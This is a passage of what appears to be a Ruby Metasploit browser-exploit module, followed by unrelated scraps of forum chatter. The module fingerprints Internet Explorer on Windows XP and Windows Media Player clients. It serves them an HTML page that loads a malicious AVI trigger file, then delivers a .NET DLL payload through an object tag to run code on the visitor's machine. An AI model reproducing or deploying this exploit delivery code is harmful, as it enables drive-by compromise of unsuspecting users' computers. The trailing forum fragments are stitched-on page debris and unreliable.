@trigger = f.read(f.stat.size)
f.close
super
end
def on_request_uri(cli, request)
agent = request['User-Agent']
case request['User-Agent']
when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/
when /Windows-Media-Player/
# AVI is requested by WMP
else
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}")
return
end
if (request.uri =~ /\.html/i)
avi_name = rand_text_alpha(4)
avi_trigger = ""
if ("/" == get_resource[-1,1])
avi_trigger = get_resource[0, get_resource.length - 1]
else
avi_trigger = get_resource
end
avi_trigger << "/#{avi_name}.avi"
html = %Q|<html>
<body>
<OBJECT ID="MediaPlayer"
CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"
CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."
TYPE="application/x-oleobject" width="280" height="46">
<param name="fileName" value="#{avi_trigger}">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-300">
<embed type="application/x-mplayer2"
pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
src="#{avi_trigger}"
name="MediaPlayer"
width=280
height=46
autostart=1
showcontrols=1
volume=-300>
</embed>
</OBJECT>
</body>
</html>
|
html = html.gsub(/^\t\t\t/, '')
print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
elsif (request.uri =~ /\.avi$/i)
print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..."
send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
return
elsif (request.uri =~ /\.dll$/i)
print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..."
send_response(
cli,
@dotnet_payload,
{
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
}
)
return
end
html_name = rand_text_alpha(4)
dll_uri = ""
html_trigger = ""
if ("/" == get_resource[-1,1])
dll_uri = get_resource[0, get_resource.length - 1]
html_trigger = get_resource[0, get_resource.length - 1]
else
dll_uri = get_resource
html_trigger = get_resource
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"
html_trigger << "/#{html_name}.html"
html = %Q|<html>
<head>
<script language="javascript">
function forward() {
window.location = window.location + '#{html_trigger}';
}
function start() {
setTimeout("forward()", 2000);
}
</script>
</head>
<body onload="start()">
<object classid="#{dll_uri}#GenericControl">
<object>
</body>
</html>
|
html = html.gsub(/^\t\t/, '')
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end
-
nice code.
-Gonzalez
-
God forbid, I felt sick when I saw it.
-Gonzalez
-
Coldplay - Yellow.mp3
-Gonzalez
-
-Gonzalez
-
-
GFY!
-Gonzalez
IM client?
in Off-topic
Web-based! :)
-Gonzalez